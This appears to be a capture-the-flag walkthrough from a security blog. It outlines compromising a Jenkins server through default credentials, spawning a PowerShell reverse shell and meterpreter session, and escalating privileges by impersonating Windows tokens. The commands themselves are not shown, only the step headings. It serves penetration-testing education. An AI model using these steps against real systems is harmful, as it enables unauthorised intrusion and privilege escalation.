Exploited Jenkins gained an initial shell, then escalated privileges by exploiting Windows authentication tokens. Deployment of meterpreter with web_delivery.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continued reading, you acknowledge the aforementioned user risks/responsibilities.
Nmap all ports:
Open Port Review:
Port 80 - Microsft IIS httpd 7.5 - webserver
image bruce.jpg and email exposed
Port 3389 - Remote RDP
Port 8080 - Jetty 9.4.z-SNAPSHOT - webserver
login attempt with
admin:admin enable access to backend.
version number exposed as
Jenkins ver. 2.190.1
Under “Build” section of the
/job/project/configure the “whoami” offers an ability execute commands on the target system.
PowerShellTcp.ps1 to create a reverse shell:
Github Link: https://github.com/samratashok/nishang.git
creating webserver on local machine via python3
adding powershell command to console “Build” section:
Listener setup: rlwrap allows for (up, down, left, right keyboard commands)
Upgrading shell to meterpreter shell
create payload with msfvenom
Download revshell to target
Start process with:
(in my case meterpreter would hang and never fully connect to handler. Moved to creating meterpreter session with web_delivery)
Creating Meterpreter shell via web_delivery
took the generated code and executed on target:
Migrate to higher process
Windows User Impersonation
investigate privleages of bruce:
from this we are able exploit as they are enabled:
Load Incognito + List tokens within meterpreter